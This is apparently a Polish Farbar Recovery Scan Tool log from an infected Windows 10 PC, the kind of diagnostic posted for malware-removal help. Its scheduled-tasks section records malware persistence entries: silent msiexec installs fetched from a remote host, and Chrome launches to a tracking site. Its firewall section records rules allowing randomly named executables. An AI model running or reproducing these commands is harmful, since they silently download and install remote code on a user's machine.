Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 20.06.2018
Uruchomiony przez Ryuuku (23-09-2018 12:03:57)
Uruchomiony z D:\Ryuuku\Downloads
Windows 10 Pro Wersja 1709 16299.666 (X64) (2018-09-22 11:37:36)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-2057919454-3684139494-2045405119-500 - Administrator - Disabled)
Gość (S-1-5-21-2057919454-3684139494-2045405119-501 - Limited - Disabled)
Konto domyślne (S-1-5-21-2057919454-3684139494-2045405119-503 - Limited - Disabled)
Ryuuku (S-1-5-21-2057919454-3684139494-2045405119-1001 - Administrator - Enabled) => C:\Users\Ryuuku
WDAGUtilityAccount (S-1-5-21-2057919454-3684139494-2045405119-504 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

µTorrent (HKU\S-1-5-21-2057919454-3684139494-2045405119-1001\...\uTorrent) (Version: 3.5.4.44632 - BitTorrent Inc.)
7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Aktualizacje NVIDIA 33.2.0.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 33.2.0.0 - NVIDIA Corporation) Hidden
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 18.6.2349 - AVAST Software)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 411.63 - NVIDIA Corporation) Hidden
Fernbus Simulator (HKLM-x32\...\Fernbus Simulator_is1) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 69.0.3497.100 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.123 - Google Inc.) Hidden
Informacje o systemie Creative (HKLM-x32\...\SysInfo) (Version: 1.10 - Creative Technology Limited)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6291 - Intel Corporation)
IrfanView 4.51 (64-bit) (HKLM\...\IrfanView64) (Version: 4.51 - Irfan Skiljan)
Jing (HKLM-x32\...\{8C784F8B-89D0-4A59-A000-7EEF129E1574}) (Version: 2.9.15255.1 - TechSmith Corporation)
K-Lite Mega Codec Pack 14.4.5 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.4.5 - KLCP)
Microsoft OneDrive (HKU\S-1-5-21-2057919454-3684139494-2045405119-1001\...\OneDriveSetup.exe) (Version: 18.151.0729.0012 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.13.26020 (HKLM-x32\...\{7474cd6e-76cc-4257-837e-5b9261e526af}) (Version: 14.13.26020.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.13.26020 (HKLM-x32\...\{5c045b7f-e561-4794-91f8-c6cda0893107}) (Version: 14.13.26020.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{756E195A-CB58-4B99-917F-0DDA0D881204}) (Version: 1.0.4.0 - Mojang)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.11 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 3.15.0.164 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.15.0.164 - NVIDIA Corporation)
NVIDIA Oprogramowanie systemu PhysX 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
NVIDIA Sterownik 3D Vision 411.63 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 411.63 - NVIDIA Corporation)
NVIDIA Sterownik dźwięku HD 1.3.37.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.5 - NVIDIA Corporation)
NVIDIA Sterownik graficzny 411.63 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 411.63 - NVIDIA Corporation)
NVIDIA Sterownik kontrolera 3D Vision 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
Panel sterowania NVIDIA 411.63 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 411.63 - NVIDIA Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8302 - Realtek Semiconductor Corp.)
ScpToolkit (HKLM\...\{730D2D63-4863-49A9-876F-9A69320C6DB1}) (Version: 1.7.276.16101 - Nefarius Software Solutions)
Sound Blaster Tactic(3D) (HKLM-x32\...\{92000C16-939B-44CA-802F-0D552019D7C8}) (Version: 1.0 - Creative Technology Limited)
Spotify (HKU\S-1-5-21-2057919454-3684139494-2045405119-1001\...\Spotify) (Version: 1.0.89.313.g34a58dea - Spotify AB)
The Sims 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.797.20 - Electronic Arts)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{133A2E34-3E09-4A1A-A9AA-F9D8E5417199}) (Version: 2.50.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-09-22] (AVAST Software)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => E:\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-09-22] (AVAST Software)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-09-22] (AVAST Software)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => E:\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\System32\DriverStore\FileRepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\igfxDTCM.dll [2018-09-01] (Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-09-18] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => E:\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-09-22] (AVAST Software)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {031C5E90-2DC1-47A9-B18A-BA62A50B5D1B} - System32\Tasks\{84BA2884-E7CC-76DF-A609-4099971479D6} => "msiexec" /q -i hxxp://zevariurs.com/ep1hcnmxg1wu.iul
Task: {031E08D8-BBB6-45D7-8E79-EE276F67F075} - System32\Tasks\{DF9AEE5D-429B-E559-BE4E-426FE6DB5740} => "msiexec" /q -i hxxp://zevariurs.com/ep1hcnmxg1wu.ieo
Task: {0AFC3E2A-7B5B-485A-979F-84073A05A83F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-09-22] (Google Inc.)
Task: {1130843F-7167-4873-B01D-AB12DE54DED0} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-09-12] (NVIDIA Corporation)
Task: {127FAB7F-B0EA-43D5-8856-1198750458DB} - System32\Tasks\ScpUpdater => E:\ScpToolkit\ScpUpdater.exe [2016-04-10] (Nefarius Software Solutions)
Task: {2FC40936-6ABE-4F03-BB21-A521E5827BB2} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-09-22] (AVAST Software)
Task: {474E5208-1F5E-4C4D-AD0E-0DE5AF896727} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-09-12] (NVIDIA Corporation)
Task: {56D249B5-F646-4182-89BB-A21D413FF181} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-09-12] (NVIDIA Corporation)
Task: {636AD5F0-226D-497A-AC4F-779BC299C81E} - System32\Tasks\{64D37BF8-BBEA-A456-51C9-A118801C0D0E} => "msiexec" /q -i hxxp://zevariurs.com/lyyxybwnoxtt.lvt
Task: {65770289-0954-4F4A-80B2-DAA271AE2B74} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-09-12] (NVIDIA Corporation)
Task: {7183BCD7-55A1-4AD4-A641-F8A78899F942} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-09-12] (NVIDIA Corporation)
Task: {7479A460-5893-42C3-95D1-A4803628BA6C} - System32\Tasks\{605AE53A-C188-3376-5E0D-68183401157D} => "msiexec" /q -i hxxp://zevariurs.com/lyyxybwnoxtt.lvt
Task: {85D6E406-D28E-468A-93C2-BEA29430105A} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-09-12] (NVIDIA Corporation)
Task: {92A81569-F61B-43F8-9A6F-A4D3490C2D6B} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2018-09-22] (AVAST Software)
Task: {978D2965-E1DF-4723-B56F-2914D3658228} - System32\Tasks\{9F5410CB-B3EF-66B1-87B5-E7D9AEF5AC4A} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://bl0ging.com/cl/?guid=lx6bs30puezteu1uy7b32g0vgs8thjot&prid=1&pid=4_1324_0
Task: {A2439B69-6EB7-4407-BBBD-3FD52ED82347} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-09-12] (NVIDIA Corporation)
Task: {A374AF11-3184-433D-8A91-C45BCF208273} - System32\Tasks\Microsoft\Windows\rempl\shell => C:\Program Files\rempl\sedlauncher.exe [2018-09-13] (Microsoft Corporation)
Task: {AD107E2A-7867-4A4E-83A2-3ED95120F0AD} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-09-12] (NVIDIA Corporation)
Task: {C3C6965D-C72F-4C33-A752-3554323629A6} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-09-12] (NVIDIA Corporation)
Task: {D91378C7-5174-4B53-92FA-15E8AB8AC2D8} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-09-12] (NVIDIA Corporation)
Task: {E400EB69-6BB6-4D02-A5C8-7372508047D2} - System32\Tasks\klcp_update => CodecTweakTool.exe
Task: {F5DFB4B6-2DAB-419F-B87B-19DE05DA8727} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-09-22] (Google Inc.)
Task: {F937031D-C751-4AEA-9ECA-5238451313C4} - System32\Tasks\{159EF659-4241-B5C4-8CF9-46DF34FA3D62} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://bl0ging.com/cl/?guid=g6p9m608jw5e8plsv5eho4mf4k3ufmql&prid=1&pid=4_1324_0
Task: {FEBF2222-3973-4194-903C-BE041382988A} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-09-12] (NVIDIA Corporation)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\ScpUpdater.job => E:\ScpToolkit\ScpUpdater.exe

==================== Skróty & WMI ========================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)


==================== Załadowane moduły (filtrowane) ==============

2018-09-22 14:16 - 2018-09-12 13:44 - 001314672 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2014-05-02 12:52 - 2014-05-02 12:52 - 000599040 _____ () E:\ScpToolkit\irrKlang\amd64\irrKlang.NET4.dll
2014-05-02 07:55 - 2014-05-02 07:55 - 000185344 _____ () E:\ScpToolkit\irrKlang\amd64\ikpflac.dll
2014-05-02 07:05 - 2014-05-02 07:05 - 000173056 _____ () E:\ScpToolkit\irrKlang\amd64\ikpmp3.dll
2017-09-29 15:41 - 2017-09-29 15:41 - 000184432 _____ () C:\Windows\SYSTEM32\inputhost.dll
2018-09-23 05:40 - 2018-08-09 06:29 - 011044864 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2018-09-23 05:40 - 2018-08-09 06:23 - 001804288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-09-20 10:38 - 2018-09-01 05:31 - 000152072 _____ () C:\Windows\System32\DriverStore\FileRepository\iigd_dc_base.inf_amd64_2546eb804e2c7090\igdinfo64.dll
2018-09-22 14:16 - 2018-09-12 13:44 - 001032560 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2018-09-22 13:49 - 2018-09-22 13:49 - 067126928 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2018-09-22 13:48 - 2018-09-22 13:48 - 000575704 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2018-09-20 10:38 - 2018-09-01 05:31 - 000129984 _____ () C:\Windows\System32\DriverStore\FileRepository\iigd_dc_base.inf_amd64_2546eb804e2c7090\igdinfo32.dll
2018-09-22 13:50 - 2018-09-15 10:48 - 002257240 _____ () C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100\swiftshader\libglesv2.dll
2018-09-22 13:50 - 2018-09-15 10:48 - 000124248 _____ () C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100\swiftshader\libegl.dll

==================== Alternate Data Streams (filtrowane) =========

==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)


==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

IE trusted site: HKU\S-1-5-21-2057919454-3684139494-2045405119-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-2057919454-3684139494-2045405119-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2017-09-29 15:46 - 2017-09-29 15:44 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-2057919454-3684139494-2045405119-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 87.204.204.204 - 62.233.233.233
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==


==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [{2AF2720F-33FE-4575-BB67-C025E4C76C59}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
FirewallRules: [{AC3466FD-74CD-4BAE-A277-27DD9D17C66E}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
FirewallRules: [{AD75D6E5-9028-4302-9B26-E41538C35801}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{3231A5BF-6ADE-4B09-A48B-82E3F1F3A6D9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{1296CAE5-BEB0-498B-8665-8F4758AD192B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{DCE384C3-EF53-40A7-B395-57976F69A2A8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{D3A80C7B-AB48-4667-B468-03008D4A0970}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{5497F2C9-1110-43FE-BD24-9F58F5CDFD61}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FD4BB614-D8E4-4F1A-8DD3-B46BDA4CA8F0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{04C52638-7AA6-48B8-9EA0-B078269CF0CF}E:\teamspeak 3 client\ts3client_win64.exe] => (Allow) E:\teamspeak 3 client\ts3client_win64.exe
FirewallRules: [UDP Query User{3FC16F46-045E-4A13-B66F-03AF79E330C6}E:\teamspeak 3 client\ts3client_win64.exe] => (Allow) E:\teamspeak 3 client\ts3client_win64.exe
FirewallRules: [{89084AC5-2DC8-4EEF-9012-8047AB8C3F75}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{19F17775-B8BE-483E-80DE-40169FF5B548}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{6AA2154A-408F-494D-9C2E-4A06037B9445}] => (Allow) E:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{8BE81EBF-F41E-4623-86EE-D40BAC1B4152}] => (Allow) E:\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{18EE510A-C5EC-44B4-ABAE-A2B39E8E377F}] => (Allow) E:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{0247219A-C19E-4E40-ACEB-C23630BE92F0}] => (Allow) E:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{AE29C120-59A3-4845-B1BE-5960D1C0B4E1}C:\users\ryuuku\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ryuuku\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{F8925BE6-F884-41DF-AB95-4B9C9FC75DE9}C:\users\ryuuku\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ryuuku\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{8B59CE44-0389-482E-823F-05BD264B4427}E:\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{7E01FEF8-73F8-4561-A1BF-C52B73094666}E:\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe
FirewallRules: [{476573E7-620A-4A82-94DC-A6FDA775279C}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{A1561252-5067-48F2-8D61-9738CD177084}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{7424EC33-6527-4F51-83A7-6DEB7428B602}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{32CF2C22-9F19-4402-AF10-30030399269D}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{F9CABBDB-6993-41B7-8F03-990CFEC4A5FB}E:\the sims 4\game\bin\ts4_x64.exe] => (Block) E:\the sims 4\game\bin\ts4_x64.exe
FirewallRules: [UDP Query User{34188001-333D-4C43-A044-6BC703A0F3C6}E:\the sims 4\game\bin\ts4_x64.exe] => (Block) E:\the sims 4\game\bin\ts4_x64.exe
FirewallRules: [TCP Query User{40B4B1C0-BBD3-419C-89F1-3C1929820706}E:\overwatch\overwatch.exe] => (Allow) E:\overwatch\overwatch.exe
FirewallRules: [UDP Query User{5C665F72-39D2-4AD4-B98D-F487537EE01E}E:\overwatch\overwatch.exe] => (Allow) E:\overwatch\overwatch.exe
FirewallRules: [TCP Query User{97A88F6D-E1B5-4038-A53D-98E58E860DDB}C:\program files (x86)\electronic arts\the sims 4\game\bin\ts4.exe] => (Block) C:\program files (x86)\electronic arts\the sims 4\game\bin\ts4.exe
FirewallRules: [UDP Query User{AE374B4B-44D3-481E-B0BF-1C5271DA18A5}C:\program files (x86)\electronic arts\the sims 4\game\bin\ts4.exe] => (Block) C:\program files (x86)\electronic arts\the sims 4\game\bin\ts4.exe
FirewallRules: [TCP Query User{9CA37164-C9D6-4248-9E4D-B5426A09BA85}E:\the sims 4\game\bin\ts4.exe] => (Block) E:\the sims 4\game\bin\ts4.exe
FirewallRules: [UDP Query User{E54DBF95-39EF-42D5-B453-08DC617012B8}E:\the sims 4\game\bin\ts4.exe] => (Block) E:\the sims 4\game\bin\ts4.exe
FirewallRules: [{A2AB0068-96F5-4E9E-B6BF-69E7EEA41084}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{85D688A7-D708-407C-BC57-CF3CEC0440E0}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\AINAOOuOgklgb.exe
FirewallRules: [{3F976A86-0171-436F-9DE2-5ACC1B217144}] => (Allow) C:\Users\Ryuuku\AppData\Local\YnRepIdE.exe
FirewallRules: [{58B801B8-14EF-4366-9F67-B6A21A53BEB3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F40DD2A8-508F-46D4-AD25-605339207A84}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{EF5040F2-911D-413D-96D4-F2966DE5B32D}] => (Allow) C:\Program Files (x86)\CseOVOAOo.exe
FirewallRules: [{8E0A82BB-0383-4642-A126-3D0C18C464D4}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\hjlGaZAEIKOy.exe
FirewallRules: [{542EEA5B-B888-4282-B07F-0D1C4DD50B47}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1D9F26D1-2CB4-4BE1-9788-20540CABB336}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B1CFE105-C6DE-4F0C-A1A5-A03483977BC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D685430B-3DE0-4E4A-8204-3820B9E6B077}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{31612011-A91C-4D31-B04C-E23DD2C4F7AC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9E76281B-5526-4A25-8ED8-AE3A534EC8AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E41056A0-A47B-411A-A371-F9F220D3F058}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{25AFC395-C9D7-40BC-A156-BF5DF738080C}] => (Allow) C:\Windows\SysWOW64\svchost.exe

==================== Punkty Przywracania systemu =========================

UWAGA: Przywracanie systemu jest wyłączone

==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (09/23/2018 12:03:17 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Nie można wygenerować kontekstu aktywacji dla "D:\Ryuuku\Downloads\vcredist_arm.exe".
Nie można odnaleźć zestawu zależnego Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="arm",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0".
Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę.

Error: (09/23/2018 11:48:38 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program cośtam64.exe w wersji 20.6.2018.0 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.

Identyfikator procesu: cd4

Godzina rozpoczęcia: 01d45322940d693f

Godzina zakończenia: 4294967295

Ścieżka aplikacji: D:\Ryuuku\Downloads\cośtam64.exe

Identyfikator raportu: 0101942b-1720-481d-9a0d-0f5942cb2db8

Pełna nazwa pakietu powodującego błąd: 

Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (09/23/2018 11:48:24 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program cośtam64.exe w wersji 20.6.2018.0 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.

Identyfikator procesu: 2378

Godzina rozpoczęcia: 01d4532280ac7b03

Godzina zakończenia: 4294967295

Ścieżka aplikacji: D:\Ryuuku\Downloads\cośtam64.exe

Identyfikator raportu: ceb8a52b-179a-44a6-b9ed-e2b586bc3822

Pełna nazwa pakietu powodującego błąd: 

Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (09/23/2018 11:47:38 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Nie można wygenerować kontekstu aktywacji dla "D:\Ryuuku\Downloads\vcredist_arm.exe".
